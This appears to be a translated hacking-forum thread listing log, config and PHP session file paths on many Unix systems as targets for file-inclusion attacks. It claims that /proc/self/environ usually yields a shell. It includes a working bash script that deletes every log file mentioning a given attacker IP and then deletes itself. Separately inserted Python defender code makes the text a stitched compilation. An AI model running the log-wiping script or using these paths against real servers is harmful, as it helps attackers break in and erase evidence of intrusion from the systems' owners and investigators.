Sorry, I wanted to edit the post but hit delete) Posting it again.

IRIX:
Code:
/var/adm/SYSLOG
/var/adm/sulog
/var/adm/utmp
/var/adm/utmpx
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/lastlog/username
/usr/spool/lp/log
/var/adm/lp/lpd-errs
/usr/lib/cron/log
/var/adm/loginlog
/var/adm/pacct
/var/adm/dtmp
/var/adm/acct/sum/loginlog
/var/adm/X0msgs
/var/adm/crash/vmcore
/var/adm/crash/unix

AIX:
Code:
/var/adm/pacct
/var/adm/wtmp
/var/adm/dtmp
/var/adm/qacct
/var/adm/sulog
/var/adm/ras/errlog
/var/adm/ras/bootlog
/var/adm/cron/log
/etc/utmp
/etc/security/lastlog
/etc/security/failedlogin
/usr/spool/mqueue/syslog

SunOS:
Code:
/var/adm/messages
/var/adm/aculogs
/var/adm/aculog
/var/adm/sulog
/var/adm/vold.log
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/utmp
/var/adm/utmpx
/var/adm/log/asppp.log
/var/log/syslog
/var/log/POPlog
/var/log/authlog
/var/adm/pacct
/var/lp/logs/lpsched
/var/lp/logs/lpNet
/var/lp/logs/requests
/var/cron/log
/var/saf/_log
/var/saf/port/log

Linux:
Code:
/var/log/lastlog
/var/log/telnetd
/var/run/utmp
/var/log/secure
/root/.ksh_history
/root/.bash_history
/root/.bash_logout
/var/log/wtmp
/etc/wtmp
/etc/utmp
/var/log
/var/adm
/var/apache/log
/var/apache/logs
/usr/local/apache/log
/usr/local/apache/logs
/var/log/acct
/var/log/xferlog
/var/log/messages
/var/log/proftpd/xferlog.legacy
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/httpd/error_log
/var/log/httpd/access_log
/etc/httpd/logs/access_log
/etc/httpd/logs/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/etc/mail/access
/var/log/qmail
/var/log/smtpd
/var/log/samba
/var/log/samba-log.%m
/var/lock/samba
/root/.Xauthority
/var/log/poplog
/var/log/news.all
/var/log/spooler
/var/log/news
/var/log/news/news
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
/var/spool/tmp
/var/spool/errors
/var/spool/logs
/var/spool/locks
/usr/local/www/logs/thttpd_log
/var/log/thttpd_log
/var/log/ncftpd/misclog.txt
/var/log/ncftpd.errs
/var/log/auth

Red Hat, Mac OS X
Code:
/var/log/httpd/access_log
/var/log/httpd/error_log

Solaris
Code:
/var/apache/logs/access_log
/var/apache/logs/error_log

SuSE Linux Enterprise Server
Code:
/var/log/httpd/access_log
/var/log/httpd/error_log

Lampp
Code:
/opt/lampp/logs/error_log
/opt/lampp/logs/access_log

Debian
Code:
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache-ssl/error.log
/var/log/apache-ssl/access.log

FreeBSD
Code:
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log

OpenBSD
Code:
/var/www/log/access_log
/var/www/log/error_log
How logins to the system are recorded

There are three main places where the system saves information about a login:

/usr/etc/wtmp
/usr/etc/lastlog
/etc/utmp

utmp records who is currently using the system. The file is a sequence of entries with the following structure, which is defined in /usr/include/utmp.h:

Code:
struct utmp {
    char ut_line[8];   /* tty name */
    char ut_name[8];   /* user id */
    char ut_host[16];  /* host name, if remote */
    long ut_time;      /* time on */
}

This structure records the name of the user's terminal, the user ID of the person logging in, the host name they logged in from (if not local) and the time of login. On many platforms the structure differs, but it is still easy enough to read.

wtmp records all logins to and logouts from the system. An empty user name indicates a logout on the associated terminal. In addition, '~' indicates that the system was rebooted at the given time; entries with names containing '|' mean the system changed its time just before the login, and ones with '{' that it did so after the login was performed (i.e. the date command changed the system time). wtmp is maintained by login(1) and init(8). They do not log their own events anywhere, so if you disable them, nothing will be written to wtmp either. wtmp is used together with the /usr/ucb/last command. Is that clear? It is easy to check whether the service is not running.

/usr/adm/lastlog is used by login(1) to save the previous login dates, the times they occurred, and the host they connected from. The lastlog structure is:

Code:
struct lastlog {
    time_t ll_time;
    char   ll_line[8];
    char   ll_host[16];
};
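To make the record layout from that post concrete, here is an added example (it is not from the thread): a small Python parser that reads a wtmp image laid out exactly as the post's struct utmp (8-byte line, 8-byte name, 16-byte host, then a long), classifies each record using the markers the post describes, and runs one defender-side check on top: wtmp is append-only, so a timestamp going backwards without a time-change marker is worth a look. The 36-byte record size assumes a 32-bit little-endian long; real hosts (glibc's utmp in particular) use larger layouts, and the sample data is constructed, not captured.

```python
import struct
from datetime import datetime, timezone

# Record layout from the post's struct utmp:
#   char ut_line[8]; char ut_name[8]; char ut_host[16]; long ut_time;
# Assumption (not stated on the page): 32-bit little-endian long, so one
# record is 36 bytes. Other platforms use a different, usually larger, layout.
UTMP_FMT = "<8s8s16sl"
UTMP_SIZE = struct.calcsize(UTMP_FMT)


def _cstr(raw: bytes) -> str:
    """Fixed-width C char array -> str (stop at the first NUL)."""
    return raw.split(b"\0", 1)[0].decode("ascii", errors="replace")


def make_record(line: str, name: str, host: str, when: int) -> bytes:
    """Build one record; used here only to construct sample data."""
    return struct.pack(UTMP_FMT, line.encode(), name.encode(), host.encode(), when)


def classify(line: str, name: str) -> str:
    """Map a record to its meaning as described in the post."""
    if name == "":
        return "logout"            # empty user name = logout on that tty
    if line == "~":
        return "reboot"            # '~' = system rebooted at ut_time
    if "|" in line or "|" in name:
        return "time-change-old"   # '|' = written just before a date change
    if "{" in line or "{" in name:
        return "time-change-new"   # '{' = written just after a date change
    return "login"


def parse_wtmp(data: bytes) -> list:
    """Parse a whole wtmp image. A size mismatch is the first hint that the
    file is truncated or that the host uses another struct layout."""
    if len(data) % UTMP_SIZE:
        raise ValueError(f"length {len(data)} is not a multiple of {UTMP_SIZE}")
    records = []
    for off in range(0, len(data), UTMP_SIZE):
        raw_line, raw_name, raw_host, ts = struct.unpack_from(UTMP_FMT, data, off)
        line, name = _cstr(raw_line), _cstr(raw_name)
        records.append({
            "line": line, "name": name, "host": _cstr(raw_host),
            "time": datetime.fromtimestamp(ts, tz=timezone.utc),
            "kind": classify(line, name),
        })
    return records


def find_anomalies(records: list) -> list:
    """Defender-side check (added here, not from the post): timestamps in an
    append-only wtmp should never go backwards unless a time-change marker
    explains it."""
    problems = []
    for prev, cur in zip(records, records[1:]):
        if cur["time"] < prev["time"] and "time-change" not in cur["kind"]:
            problems.append(f"record for {cur['name'] or cur['line']!r} at "
                            f"{cur['time']:%Y-%m-%d %H:%M:%S} is earlier than the previous one")
    return problems


# Constructed sample wtmp image (not real data): reboot, login, logout, then a
# login whose timestamp is earlier than the logout before it.
SAMPLE_WTMP = b"".join([
    make_record("~", "reboot", "", 1_700_000_000),
    make_record("ttyp0", "alice", "10.0.0.5", 1_700_000_100),
    make_record("ttyp0", "", "", 1_700_000_900),
    make_record("ttyp1", "bob", "10.0.0.9", 1_700_000_500),
])

if __name__ == "__main__":
    recs = parse_wtmp(SAMPLE_WTMP)
    for r in recs:
        print(f"{r['time']:%Y-%m-%d %H:%M:%S} {r['kind']:16} {r['line']:8} {r['name']:8} {r['host']}")
    for p in find_anomalies(recs):
        print("ANOMALY:", p)
```

Run it against a real file by replacing SAMPLE_WTMP with the file contents; if parse_wtmp raises on the length, the host's utmp.h differs from the 4-field layout and UTMP_FMT has to be adjusted first.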
Code:
/usr/local/etc/apache2/vhosts.conf
/usr/local/apache/conf/vhosts.conf
/usr/local/apache2/conf/vhosts.conf
/usr/local/apache/conf/vhosts-custom.conf
/usr/local/apache2/conf/vhosts-custom.conf

Note from BlackSun: the paths here must start with a slash; without it they are relative paths.

These always contain the full, correct DocumentRoot, and often the full path to the ERROR logs as well.

And my favourite, which I don't think I have seen here yet:

Code:
/proc/self/environ

If you find this one, in 99% of cases it's an immediate shell.

Note from BlackSun: at least read the whole thread first .. https://forum.antichat.ru/showpost.php?p=1088072&postcount=11
sess_ location:
/tmp/
/php_sess/
/tmp/phpsess/
/tmp/php/
/tmp/php-sess/
/home/%username%/tmp/
/var/phptemp/
/var/phptmp/
/var/phpsess/
/var/php-sess/
/var/lib/php/
/var/lib/php/session/
/var/lib/php3
/var/lib/php3/session/
/var/lib/php4/
/var/lib/php4/session/
/var/lib/php5/
/var/lib/php5/session/
/var/lib/php6/
/var/lib/php6/session/
/www/phpsession/
C:\Temp
C:\WINDOWS\Temp
C:\PHP\sessiondata

.htaccess:
php_value "session.save_path" "/path"

phpinfo():
session.save_handler files
session.save_path /path

The best option is to look for phpinfo on the site, because there you will see the master value, i.e. what is set in php.ini, and the local value, i.e. what is set (if anything) in .htaccess. The second option is to search for php.ini and .htaccess files. And of course you can simply look for the session directory itself.
Just used this:
Code:
/etc/apache/default-server.conf
/etc/apache2/default-server.conf

May contain DocumentRoot.
A script that finds and deletes log files

Code:
#!/usr/local/bin/bash
### coded by t4z3v4r3d
### recurse function : i m not sure who has write that .So thanks unknown man
### made for FreeBSD First ....
if [ "`id -u`" != "0" ];then
    echo "$0 cant run as $USER Please Give me the root perms!!!!! "
    exit 1
fi
patern=$2
fl=/tmp/f.txt
fd=/tmp/find.txt
length=/tmp/l-f.txt
log_f=/tmp/log_f.txt
log_final=/tmp/final_log.txt
null=/dev/null
log_path=/tmp/log_Found_.txt
tm="`date | cut -d ":" -f 1`"
os=$OSTYPE
# you can add all paths for all os type !M$ windows IS NOT OS ....Exactly!
case $os in
    Linux*)   path=/etc/ ;;
    linux*)   path=/etc/ ;;
    freebsd*) path=/usr/local/ ;;
    *)        path=/ ;;
esac
rm $fl
touch $fl
rm $fd
touch $fd
rm $log_f
touch $log_f
rm $log_final
touch $log_final
rm $log_path
touch $log_path
clear
echo "Enter attacker IP"
read -e ip
if [ "`find $path -name apache >> $fl`" ];then
    echo -e "\033[3;2f Main path Found ....\033[0;0m"
else
    if [ "`find $path -name apache2 >> $fl`" ];then
        echo "Founded Apache2 Config files"
    fi
fi
recurse () {
    for file in $(/bin/ls $1)
    do
        fqfn=$1/$file
        [[ -d $fqfn ]] && recurse $fqfn
        [[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; }
        [[ -f $fqfn ]] && recurse $fqfn
        [[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; }
        #########################################################
        if [ -f $1 ];then
            let "f=f+1"
            if [ "`ls $1 | grep -F .conf`" ];then
                let "t=t+1"
                cat $1 | grep -F .log | grep -v "#" | cut -d " " -f 2 >> $log_path
                nom[$t]="`cat $1 | grep -F .log | grep -v "#" | wc -l`"
                echo -e "reading $1\n `cat $1 | grep -F .log | grep -v "#"`" >> /tmp/r.txt
                let "nt=nt+${nom[$t]}"
                let "j=$nt+$t"
            fi
        fi
        ################################################################################
        ### MOnitoring all acts
        ################################################################################
        echo -e "\033[3;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m"
        echo -e "\033[1;39m|\033[1;31m Scanned Files :\033[4;25f \033[1;37m$f\033[1;39m\033[4;40f|\033[0;0m"
        echo -e "\033[1;39m|\033[1;31m Path(s) found :\033[5;25f \033[1;37m$l\033[1;39m\033[5;40f|\033[0;0m"
        echo -e "\033[1;39m|\033[1;31m pattern found :\033[6;25f \033[1;37m$t\033[1;39m\033[6;40f|\033[0;0m"
        echo -e "\033[1;39m|\033[1;31m pattern total :\033[7;25f \033[1;37m$j\033[1;39m\033[7;40f|\033[0;0m"
        echo -e "\033[1;39m|\033[1;30m\033[8;2f Scanning `dirname ${1}`::: \033[1;39m\033[8;40f|\033[0;0m"
        echo -e "\033[9;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m"
        ##############################################################################
    done ;
}
reader(){
    cat $fl | while read line ;do
        if [ "`ls $line | grep .conf`" != "" ];then
            recurse $line
        fi
        let "l=l+1"
    done
}
reader
log_path_reader(){
    cat $log_path | while read line ;do
        if [ -f $line ];then
            if [ "`cat $line | grep "$ip"`" != "" ];then
                echo -en "\033[1;30mFounded[\033[1;31m"`cat $line | grep -c "$ip"`" \033[1;30m] $ip in "
                echo -n "Removing $line"
                rm $line
                if [ ! -f $line ];then
                    echo -e "\033[1;39m ... Done !\033[0;0m"
                else
                    echo -e "\033[1;31m ...Failed!\033[1;0m"
                fi
            fi
        else
            echo -e "\033[1;30mFile [\033[1;31m"$line " \033[1;39mFile Dose not exist......\033[1;30m]"
        fi
        let "l2=l2+1"
    done
}
echo -e "\033[8;3f\033[1;31mpath= $path OS= $os\033[0;0m"
echo -e "\033[11;1f\033[1;30mScanning DONE!! NOW : Removing Log Files \033[0;0m"
log_path_reader
echo -en "\033[1;30mRemoving $0 "
rm $fl $log_path $0
if [ ! -f $0 ];then
    echo -e "\033[1;39m ... Done !\033[0;0m"
else
    echo -e "\033[1;31m ...Failed!\033[1;0m"
fi
echo -e "\033[1;37m Mail: [email protected]\033[0;0m"
Zeus Web Server (ZWS)
default conf:
/usr/local/zeus/web/global.cfg
default log:
/usr/local/zeus/web/log/errors

LiteSpeed Web Server
default conf:
/opt/lsws/conf/httpd_conf.xml
/usr/local/lsws/conf/httpd_conf.xml
default log:
/opt/lsws/logs/error.log
/opt/lsws/logs/access.log
/usr/local/lsws/logs/error.log
/usr/local/logs/access.log
Daemons are often started through init.d. That makes finding their logs and configs much easier for us.

init.d - mysql
/etc/init.d/mysql

init.d - apache
/etc/init.d/httpd
/etc/init.d/apache
/etc/init.d/apache2

Roughly what such a file looks like:

Code:
#!/bin/sh
#
# Copyright (c) 1996, 1997, 1998 S.u.S.E. GmbH
# Copyright (c) 1998, 1999, 2000, 2001 SuSE GmbH
# Copyright (c) 2002, 2003 SuSE Linux AG
#
# Authors: Rolf Haberrecker <[email protected]>, 2001
#          Peter Poeml <[email protected]>, 2002, 2003, 2004, 2005
#
#
# /etc/init.d/apache2
#
### BEGIN INIT INFO
# Provides:       apache2 httpd2
# Required-Start: $local_fs $remote_fs $network
# X-UnitedLinux-Should-Start: $named $time postgresql sendmail mysql ypclient dhcp radiusd
# Required-Stop:  $local_fs $remote_fs $network
# X-UnitedLinux-Should-Stop:
# Default-Start:  3 5
# Default-Stop:   0 1 2 6
# Short-Description: Apache 2.2 httpd
# Description:    Start the httpd daemon Apache
### END INIT INFO

pname=apache2
: ${sysconfdir:=/etc/$pname}
: ${apache_link:=/usr/sbin/httpd2}
: ${sysconfig_apache:=/etc/sysconfig/$pname}
: ${pidfile:=/var/run/httpd2.pid}
: ${logdir:=/var/log/$pname}

#
# load the configuration
#
test -s /etc/rc.status && . /etc/rc.status && rc_reset
. /usr/share/$pname/load_configuration
export ${!APACHE_*}

httpd_conf=${APACHE_HTTPD_CONF:-$sysconfdir/httpd.conf}

apache_bin=$(/usr/share/$pname/find_mpm 2>/dev/null)
test -L $apache_link && apache_bin=$(readlink $apache_link)
if [ -z "$APACHE_MPM" ]; then
    APACHE_MPM=${apache_bin##*-}
fi

if ! [ -x $apache_bin ]; then
    echo >&2 ${warn}$apache_bin-$APACHE_MPM is not a valid httpd2 binary.
    echo >&2 Check your APACHE_MPM setting in /etc/sysconfig/$pname. $norm
    rc_failed 5
    rc_status -v1
    rc_exit
fi

get_server_flags()
{
    unset server_flags
    case "$action" in
        startssl) server_flags="-DSSL";;
    esac
    for i in $APACHE_SERVER_FLAGS; do
        case $i in
            -D)  ;;
            -D*) server_flags="$server_flags $i";;
            *)   server_flags="$server_flags -D$i";;
        esac
    done
}

action="$1"
case "$action" in
    stop|try-restart|*status*|probe) ;;
    *)
        shift
        get_server_flags
        ${get_module_list_done:=false} || /usr/share/$pname/get_module_list && export get_module_list_done=true
        ${get_includes:=false} || /usr/share/$pname/get_includes && export get_includes_done=true
        ;;
esac

#
# main part
#
case "$action" in
    start*)
        if [ -e $pidfile ]; then
            $0 status &>/dev/null
            ret=$?
            if [ $ret = 1 ]; then
                echo "Warning: found stale pidfile (unclean shutdown?)"
            elif [ $ret = 0 ]; then
                echo "Apache is already running ($pidfile)"
                rc_failed $ret
                rc_status -v1
                rc_exit
            fi
        fi
        echo -n "Starting httpd2 (${APACHE_MPM:-${apache_bin#*-}}) "
        cmdline=$(echo $apache_bin -f $httpd_conf $server_flags "$@")
        if eval $cmdline -t > $logdir/rc$pname.out 2>&1 ; then
            export -n ${!APACHE_*}
            eval startproc -f -t ${APACHE_START_TIMEOUT:-2} $cmdline
            ret=$?
            if test -t 1 && stty -a 2>/dev/null | grep -q -- -echo\ ; then
                # this means that apache was still waiting for a passphrase to be entered
                stty echo 2>/dev/null
                echo;echo
                echo >&2 An SSL passphrase has not been entered within ${APACHE_START_TIMEOUT:-<not set>} seconds.
                echo >&2 To increase this timeout, adjust APACHE_START_TIMEOUT in $sysconfig_apache .
                # this surely means that apache won't start, despite it looked good to startproc
                killall $apache_bin
                echo >&2 "Trying to start the server without SSL (-D NOSSL)."
                $0 start "$@" -D NOSSL
                # rc_failed 1
                # rc_status -v1
                # rc_exit
            else
                rc_failed $ret
                rc_status -v
            fi
        else
            if [ "$link" = "$base" ] ; then
                cat $logdir/rc$pname.out
                echo >&2
                echo >&2 The command line was:
                echo >&2 $cmdline
                echo >&2
            else
                echo -e -n "\nsee $logdir/rc$pname.out for details\n";
            fi
            rc_failed 1
            rc_status -v1
        fi
        ;;
    stop)
        echo -n "Shutting down httpd2 "
        if [ ! -f $pidfile -a -f $pidfile.rpmsave ]; then mv $pidfile.rpmsave $pidfile; fi
        if ! [ -f $pidfile ]; then
            echo -n "(not running)"
        else
            pid=$(<$pidfile)
            kill -TERM $pid 2>/dev/null
            case $? in
                1) echo -n "(not running)";;
                0)
                    # wait until the processes are gone (the parent is the last one)
                    echo -n "(waiting for all children to terminate) "
                    for ((wait=0; wait<120; wait++)); do
                        if test -f $pidfile; then
                            usleep 500000
                            continue
                        fi
                        if ! test -f /proc/$pid/exe; then
                            break
                        fi
                        if test "$(readlink /proc/$pid/exe 2>/dev/null)" = $apache_bin; then
                            usleep 500000
                        else
                            break
                        fi
                    done
                    ;;
            esac
        fi
        rc_status -v
        ;;
    try-restart)
        ## Do a restart only if the service was active before.
        ## Note: try-restart is now part of LSB (as of 1.9).
        ## RH has a similar command named condrestart.
        $0 status
        if test $? = 0; then
            $0 restart
        else
            rc_reset        # Not running is not a failure.
        fi
        # Remember status and be quiet
        rc_status
        ;;
    restart)
        $0 configtest "$@" || { rc_failed $?; rc_exit; }
        if $0 status &>/dev/null; then
            $0 stop
        fi
        $0 start "$@"
        # Remember status and be quiet
        rc_status
        ;;
    restart-hup)
        $0 configtest "$@" || { rc_failed $?; rc_exit; }
        if $0 status &>/dev/null; then
            echo -n "Restarting httpd2 (SIGHUP)"
            kill -HUP $(<$pidfile) || return=$rc_failed
        else
            $0 start "$@"
        fi
        # Remember status and be quiet
        rc_status -v
        ;;
    reload|force-reload|graceful)
        echo -n "Reload httpd2 (graceful restart)"
        cmdline=$(echo $apache_bin -f $httpd_conf $server_flags "$@")
        if eval $cmdline -t &> $logdir/rc$pname.out; then
            killproc -USR1 $apache_bin || return=$rc_failed
            rc_status -v
        else
            if [ "$link" = "$base" ] ; then
                echo -e -n "\n\n"
                cat $logdir/rc$pname.out
                echo >&2
                echo >&2 The command line was:
                echo >&2 $cmdline
                echo >&2
            else
                echo -e -n "\nsee $logdir/rc$pname.out for details\n";
            fi
            rc_failed 6
            rc_status -v1
        fi
        ;;
    status)
        if [ ! -f $pidfile -a -f $pidfile.rpmsave ]; then mv $pidfile.rpmsave $pidfile; fi
        echo -n "Checking for httpd2: "
        # we don't use checkproc here since it is confused when we exchange the binaries
        if ! [ -f $pidfile ]; then
            # not running
            rc_failed 3
        elif [ -s $pidfile -a -d /proc/$(<$pidfile) ]; then
            # running
            :
        else
            # stale pid file
            rc_failed 1
            #rm -f $pidfile
        fi
        rc_status -v
        ;;
    probe)
        ## Optional: Probe for the necessity of a reload,
        ## give out the argument which is required for a reload.
        for i in $httpd_conf \
                 $APACHE_CONF_INCLUDE_FILES \
                 $APACHE_CONF_INCLUDE_DIRS
        do
            if [ $i -nt $pidfile ]; then
                echo reload
                break
            fi
        done
        ;;
    conf*|test|syntax|check)
        cmdline=$(echo $apache_bin -f $httpd_conf $server_flags "$@")
        eval $cmdline -t
        rc_failed $?
        rc_exit
        ;;
    extr*)
        cmdline=$(echo $apache_bin -f $httpd_conf $server_flags "$@")
        out=$(su - nobody -c "$cmdline" 2>&1)
        case $out in
            *make_sock:\ could\ not\ bind\ to\ address*) echo Syntax: OK; rc_failed=0;;
            *) echo Syntax: NOT OK:; echo $out; rc_failed=1;;
        esac
        rc_exit
        ;;
    server-status)
        apache2ctl status
        ;;
    full-server-status|fullstatus)
        apache2ctl fullstatus
        ;;
    *)
        cat >&2 <<-EOF
Usage: $0 <command> <server flags>
where <command> is one of:
    start              - start httpd
    startssl           - start httpd with -DSSL
    stop               - stop httpd (sending SIGTERM to parent)
    try-restart        - stop httpd and if this succeeds (i.e. if
                         it was running before), start it again.
    status             - check whether httpd is running
    restart            - stop httpd if running; start httpd
    reload|graceful    - do a graceful restart by sending a SIGUSR1
                         or start if not running
    configtest         - do a configuration syntax test
    extreme-configtest - try to run httpd as nobody (detects more
                         errors by actually loading the configuration,
                         but cannot read SSL certificates)
    probe              - probe for the necessity of a reload,
                         give out the argument which is required
                         for a reload. (by comparing conf files
                         with pidfile timestamp)
    full-server-status - dump a full status screen; requires lynx
                         or w3m and mod_status enabled
    server-status      - dump a short status screen; requires lynx
                         or w3m and mod_status enabled
    help               - this screen
optional server flags are passed through to httpd.
EOF
        exit 1
esac

# Inform the caller not only verbosely and set an exit status.
rc_exit

Look at:

pname=apache2
: ${sysconfdir:=/etc/$pname}
...
httpd_conf=${APACHE_HTTPD_CONF:-$sysconfdir/httpd.conf}

In this case the config is at /etc/apache2/httpd.conf.
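The init script above tells you where httpd.conf lives, and the log-removal script earlier in the thread greps .conf files for .log lines and then deletes whatever mentions an address. The defender-side counterpart of both is to enumerate the same log paths from the configuration and check whether the web-server user, or anyone, could truncate, unlink or replace them. The Python below is an added example, not code from the thread or from any of the projects named here: it resolves ErrorLog/CustomLog/TransferLog/PidFile targets against ServerRoot the way httpd does, skips piped loggers, and reports ownership and permission problems on each file and its parent directory. The config text is constructed, and the uid 33 for the web-server user is an assumption (www-data on Debian-derived systems).

```python
import os
import shlex
import stat

# Apache directives whose first argument names a file the server writes to.
LOG_DIRECTIVES = {"errorlog", "customlog", "transferlog", "pidfile"}


def extract_log_paths(conf_text: str, server_root: str = "/etc/apache2") -> list:
    """Return the absolute log paths declared in Apache-style config text.
    Relative paths are resolved against ServerRoot as httpd does; piped
    loggers ("|/usr/sbin/rotatelogs ...") and syslog targets are skipped.
    Comment handling is deliberately simple: everything after '#' is dropped."""
    found = []
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        try:
            parts = shlex.split(line)
        except ValueError:          # unbalanced quote: fall back to whitespace split
            parts = line.split()
        if len(parts) < 2:
            continue
        key = parts[0].lower()
        if key == "serverroot":
            server_root = parts[1]
        elif key in LOG_DIRECTIVES:
            target = parts[1]
            if target.startswith("|") or target.startswith("syslog"):
                continue
            path = target if target.startswith("/") else os.path.join(server_root, target)
            path = os.path.normpath(path)
            if path not in found:
                found.append(path)
    return found


def assess_log_protection(file_uid, file_mode, dir_uid, dir_mode, web_uid) -> list:
    """Pure check on stat() results: which conditions would let the web-server
    user, or anyone, truncate, unlink or replace this log file?"""
    issues = []
    if file_uid == web_uid:
        issues.append("file owned by the web-server user: a compromised worker can truncate it")
    if file_mode & stat.S_IWOTH:
        issues.append("file is world-writable")
    if dir_uid == web_uid:
        issues.append("parent directory owned by the web-server user: file can be unlinked or replaced")
    if dir_mode & stat.S_IWOTH and not dir_mode & stat.S_ISVTX:
        issues.append("parent directory world-writable without sticky bit")
    return issues


def audit_log_path(path: str, web_uid: int) -> list:
    """Apply assess_log_protection() to a real path on this host."""
    try:
        st = os.lstat(path)
        pst = os.lstat(os.path.dirname(path) or "/")
    except FileNotFoundError:
        return ["missing: never created, rotated away, or deleted"]
    return assess_log_protection(st.st_uid, st.st_mode, pst.st_uid, pst.st_mode, web_uid)


# Constructed sample config (not from the thread): a global error log, an
# access log, a vhost with a ServerRoot-relative log, and a piped logger.
SAMPLE_CONF = """\
ServerRoot "/etc/apache2"
ErrorLog /var/log/apache2/error_log
# ErrorLog /var/log/apache2/old_error_log        (commented out, must be ignored)
CustomLog "/var/log/apache2/access_log" combined
<VirtualHost *:80>
    ServerName www.example.com
    ErrorLog logs/www.example.com-error_log
    CustomLog "|/usr/sbin/rotatelogs /var/log/apache2/rotated_%Y%m%d 86400" combined
</VirtualHost>
"""

if __name__ == "__main__":
    WWW_UID = 33   # assumed uid of the web-server user (www-data on Debian/Ubuntu)
    for p in extract_log_paths(SAMPLE_CONF):
        print(p, audit_log_path(p, WWW_UID) or ["ok"])
```

Point extract_log_paths at the real httpd.conf (plus any vhosts.conf or sites-enabled files it includes; Include directives are not followed here) and feed the result to audit_log_path. Any path whose parent directory is owned or writable by the web-server user is exactly the situation the thread's rm-based script relies on.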
Here is a perverse layout I ran into on FreeBSD today:
Code:
/usr/local/etc/apache/httpd.conf
/usr/local/etc/apache/vhosts.conf
Ubuntu (becoming common):
Code:
/etc/apache2/sites-available/default
/etc/apache2/sites-available/default-ssl
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/etc/apache2/ports.conf
/etc/apache2/sites-enabled/000-default
/etc/apache2/sites-enabled/default
NetBSD:
Code:
/usr/pkg/etc/httpd/httpd.conf
/usr/pkg/etc/httpd/httpd-default.conf
/usr/pkg/etc/httpd/httpd-vhosts.conf